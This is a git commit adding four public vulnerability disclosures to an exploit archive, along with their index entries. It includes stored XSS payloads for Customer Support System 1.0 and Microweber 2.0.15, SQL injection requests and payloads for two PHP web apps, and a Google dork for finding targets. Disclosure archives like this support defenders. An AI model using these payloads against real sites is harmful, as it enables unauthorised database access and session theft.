DB: 2024-07-02

5 changes to exploits/shellcodes/ghdb Azon Dominator Affiliate Marketing Script - SQL Injection Customer Support System 1.0 - Stored XSS Microweber 2.0.15 - Stored XSS Xhibiter NFT Marketplace 1.10.2 - SQL Injection
2024-07-02 00:16:21 +00:00 · 2024-07-02 00:16:21 +00:00 · ec14967376
commit ec14967376
parent 2680e71d44
5 changed files with 105 additions and 0 deletions
--- a/exploits/php/webapps/52057.txt
+++ b/exploits/php/webapps/52057.txt
@ -0,0 +1,17 @@
 # Exploit Title:  Customer Support System 1.0 - (XSS) Cross-Site
 Scripting Vulnerability in the "subject" at "ticket_list"
 # Date: 28/11/2023
 # Exploit Author: Geraldo Alcantara
 # Vendor Homepage:
 https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
 # Software Link:
 https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
 # Version: 1.0
 # Tested on: Windows
 # CVE : CVE-2023-49976
 *Steps to reproduce:*
 1- Log in to the application.
 2- Visit the ticket creation/editing page.
 3- Create/Edit a ticket and insert the malicious payload into the
 "subject" field/parameter.
 Payload: <dt/><b/><script>alert(document.domain)</script>
--- a/exploits/php/webapps/52058.txt
+++ b/exploits/php/webapps/52058.txt
@ -0,0 +1,19 @@
 # Exploit Title: Stored XSS in Microweber
 # Date: 06/18/2024
 # Exploit Author: tmrswrr
 # Vendor Homepage: (https://microweber.me/)
 # Version: 2.0.15
 # Tested on: (http://active.demo.microweber.me/)
 ## Vulnerability Description
 A Stored Cross-Site Scripting (XSS) vulnerability has been identified in Microweber version 2.0.15. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session.
 ## Steps to Reproduce
 1. Log in to the application.
 2. Navigate to `Users > Edit Profile`.
 3. In the `First Name` field, input the following payload:
    "><img src=x onerror=confirm(document.cookie)>
 4. Save the changes.
 5. Upon visiting any page where the modified user profile is displayed, an alert box will appear, indicating the execution of the injected script.
--- a/exploits/php/webapps/52059.txt
+++ b/exploits/php/webapps/52059.txt
@ -0,0 +1,38 @@
 # Exploit Title: Azon Dominator - Affiliate Marketing Script - SQL Injection
 # Date: 2024-06-03
 # Exploit Author: Buğra Enis Dönmez
 # Vendor: https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script
 # Demo Site: https://azon-dominator.webister.net/
 # Tested on: Arch Linux
 # CVE: N/A
 ### Request ###
 POST /fetch_products.php HTTP/1.1
 Content-Type: application/x-www-form-urlencoded
 Accept: */*
 x-requested-with: XMLHttpRequest
 Referer: https://localhost/
 Cookie: PHPSESSID=crlcn84lfvpe8c3732rgj3gegg; sc_is_visitor_unique=rx12928762.1717438191.4D4FA5E53F654F9150285A1CA42E7E22.8.8.8.8.8.8.8.8.8
 Content-Length: 79
 Accept-Encoding: gzip,deflate,br
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
 Host: localhost
 Connection: Keep-alive
 cid=1*if(now()=sysdate()%2Csleep(6)%2C0)&max_price=124&minimum_range=0&sort=112
 ###
 ### Parameter & Payloads ###
 Parameter: cid (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cid=1) AND 7735=7735 AND (5267=5267
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: cid=1) AND (SELECT 7626 FROM (SELECT(SLEEP(5)))yOxS) AND (8442=8442
 ###
--- a/exploits/php/webapps/52060.txt
+++ b/exploits/php/webapps/52060.txt
@ -0,0 +1,27 @@
 # Exploit Title: xhibiter nft marketplace SQLI
 # Google Dork: intitle:"View - Browse, create, buy, sell, and auction NFTs"
 # Date: 29/06/204
 # Exploit Author: Sohel yousef - https://www.linkedin.com/in/sohel-yousef-50a905189/
 # Vendor Homepage: https://elements.envato.com/xhibiter-nft-marketplace-html-template-AQN45FA
 # Version: 1.10.2
 # Tested on: linux
 # CVE : [if applicable]
 on this dir
 https://localhost/collections?id=2
 xhibiter nft marketplace suffers from SQLI
 ---
 Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2' AND 4182=4182 AND 'rNfD'='rNfD
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2' AND (SELECT 1492 FROM (SELECT(SLEEP(5)))HsLV) AND 'KEOa'='KEOa
    Type: UNION query
    Title: MySQL UNION query (NULL) - 36 columns
    Payload: id=2' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162626271,0x655465754c50524d684f764944434458624e4e596c614b6d4a56656f495669466d4b704362666b58,0x71716a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
 ---
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -14543,6 +14543,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 25373,exploits/php/webapps/25373.txt,"Azerbaijan Development Group AzDGDatingPlatinum 1.1.0 - 'view.php?id' Cross-Site Scripting",2005-04-09,kre0n,webapps,php,,2005-04-09,2013-05-12,1,CVE-2005-1081;OSVDB-15526,,,,,https://www.securityfocus.com/bid/13082/info
 25374,exploits/php/webapps/25374.txt,"Azerbaijan Development Group AzDGDatingPlatinum 1.1.0 - 'view.php?id' SQL Injection",2005-04-09,kre0n,webapps,php,,2005-04-09,2013-05-12,1,CVE-2005-1082;OSVDB-15524,,,,,https://www.securityfocus.com/bid/13082/info
 12695,exploits/php/webapps/12695.txt,"Azimut Technologie - Admin Authentication Bypass",2010-05-22,Ra3cH,webapps,php,,2010-05-21,,0,,,,,,
 52059,exploits/php/webapps/52059.txt,"Azon Dominator Affiliate Marketing Script - SQL Injection",2024-07-01,"Buğra Enis Dönmez",webapps,php,,2024-07-01,2024-07-01,0,,,,,,
 860,exploits/php/webapps/860.c,"Aztek Forum 4.0 - 'myadmin.php' Database Dumper",2005-03-07,sirius_black,webapps,php,,2005-03-06,,1,OSVDB-14632;CVE-2005-0700,,,,,
 1616,exploits/php/webapps/1616.pl,"Aztek Forum 4.0 - 'myadmin.php' User Privilege Escalation",2006-03-26,Sparah,webapps,php,,2006-03-25,2017-04-07,1,,,,,,
 24731,exploits/php/webapps/24731.txt,"Aztek Forum 4.0 - Multiple Input Validation Vulnerabilities",2004-11-12,"benji lemien",webapps,php,,2004-11-12,2013-03-12,1,CVE-2004-2725;OSVDB-11704,,,,,https://www.securityfocus.com/bid/11654/info
@ -16659,6 +16660,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49276,exploits/php/webapps/49276.txt,"Customer Support System 1.0 - 'id' SQL Injection",2020-12-17,"Saeed Bala Ahmed",webapps,php,,2020-12-17,2020-12-17,0,,,,,,
 49030,exploits/php/webapps/49030.txt,"Customer Support System 1.0 - 'username' Authentication Bypass",2020-11-11,"Ahmed Abbas",webapps,php,,2020-11-11,2020-11-11,0,,,,,,
 49029,exploits/php/webapps/49029.txt,"Customer Support System 1.0 - Cross-Site Request Forgery",2020-11-11,"Ahmed Abbas",webapps,php,,2020-11-11,2020-11-11,0,,,,,,
 52057,exploits/php/webapps/52057.txt,"Customer Support System 1.0 - Stored XSS",2024-07-01,"Geraldo Alcantara",webapps,php,,2024-07-01,2024-07-01,0,,,,,,
 50994,exploits/php/webapps/50994.txt,"CuteEditor for PHP 6.6 - Directory Traversal",2022-08-01,"Stefan Hesselman",webapps,php,,2022-08-01,2022-08-01,0,,,,,,
 9485,exploits/php/webapps/9485.txt,"Cuteflow 2.10.3 - 'edituser.php' Security Bypass",2009-08-24,"Hever Costa Rocha",webapps,php,,2009-08-23,,1,CVE-2009-2960;OSVDB-57391,,,,,
 20111,exploits/php/webapps/20111.rb,"CuteFlow 2.11.2 - Arbitrary File Upload (Metasploit)",2012-07-27,Metasploit,webapps,php,,2012-07-27,2012-07-27,1,OSVDB-84289,"Metasploit Framework (MSF)",,,,
@ -23507,6 +23509,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 37735,exploits/php/webapps/37735.txt,"Microweber 1.0.3 - Arbitrary File Upload / Filter Bypass / PHP Remote Code Execution",2015-08-07,LiquidWorm,webapps,php,80,2015-08-07,2015-08-07,0,OSVDB-125875,,,,http://www.exploit-db.commicroweber-1.0.3.tar.gz,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5250.php
 37734,exploits/php/webapps/37734.html,"Microweber 1.0.3 - Persistent Cross-Site Scripting / Cross-Site Request Forgery (Add Admin)",2015-08-07,LiquidWorm,webapps,php,80,2015-08-07,2016-08-30,0,OSVDB-125873,,,,http://www.exploit-db.commicroweber-1.0.3.tar.gz,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5249.php
 50768,exploits/php/webapps/50768.txt,"Microweber 1.2.11 - Remote Code Execution (RCE) (Authenticated)",2022-02-21,"Chetanya Sharma",webapps,php,,2022-02-21,2022-02-21,0,CVE-2022-0557,,,,,
 52058,exploits/php/webapps/52058.txt,"Microweber 2.0.15 - Stored XSS",2024-07-01,tmrswrr,webapps,php,,2024-07-01,2024-07-01,0,,,,,,
 32831,exploits/php/webapps/32831.txt,"Microweber CMS 0.93 - Cross-Site Request Forgery",2014-04-13,sajith,webapps,php,,2014-04-13,2014-04-13,1,OSVDB-105791,,,http://www.exploit-db.com/screenshots/idlt33000/screen-shot-2014-04-13-at-104833.png,http://www.exploit-db.commicroweber-0.9343.zip,
 35720,exploits/php/webapps/35720.txt,"Microweber CMS 0.95 - SQL Injection",2015-01-07,"Pham Kien Cuong",webapps,php,80,2015-01-07,2015-01-07,0,CVE-2014-9464;OSVDB-116689,,,,http://www.exploit-db.commicroweber-0.934.tar.gz,
 49856,exploits/php/webapps/49856.py,"Microweber CMS 1.1.20 - Remote Code Execution (Authenticated)",2021-05-10,sl1nki,webapps,php,,2021-05-10,2021-05-10,0,CVE-2020-28337,,,,,
@ -34356,6 +34359,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 25090,exploits/php/webapps/25090.txt,"XGB 2.0 - Authentication Bypass",2005-02-08,"Albania Security Clan",webapps,php,,2005-02-08,2013-04-30,1,,,,,,https://www.securityfocus.com/bid/12489/info
 21381,exploits/php/webapps/21381.txt,"XGB Guestbook 1.2 - User-Embedded Scripting",2002-04-15,Firehack,webapps,php,,2002-04-15,2012-09-19,1,OSVDB-86910,,,,,https://www.securityfocus.com/bid/4513/info
 8101,exploits/php/webapps/8101.txt,"XGuestBook 2.0 - Authentication Bypass",2009-02-24,Fireshot,webapps,php,,2009-02-23,,1,OSVDB-52357;CVE-2009-0810,,,,,
 52060,exploits/php/webapps/52060.txt,"Xhibiter NFT Marketplace 1.10.2 - SQL Injection",2024-07-01,"Sohel Yousef",webapps,php,,2024-07-01,2024-07-01,0,,,,,,
 1605,exploits/php/webapps/1605.php,"XHP CMS 0.5 - 'upload' Remote Command Execution",2006-03-22,rgod,webapps,php,,2006-03-21,2016-06-30,1,OSVDB-24059;CVE-2006-1371;OSVDB-24058,,,,http://www.exploit-db.comxhp_0_5.tar.gz,
 28509,exploits/php/webapps/28509.txt,"XHP CMS 0.5.1 - 'index.php' Cross-Site Scripting",2006-09-11,"HACKERS PAL",webapps,php,,2006-09-11,2013-09-25,1,CVE-2006-4751;OSVDB-28751,,,,,https://www.securityfocus.com/bid/19948/info
 40576,exploits/php/webapps/40576.py,"XhP CMS 0.5.1 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2016-10-19,"Ahsan Tahir",webapps,php,,2016-10-19,2016-10-19,0,,,,,http://www.exploit-db.comxhp_0_5_1.zip,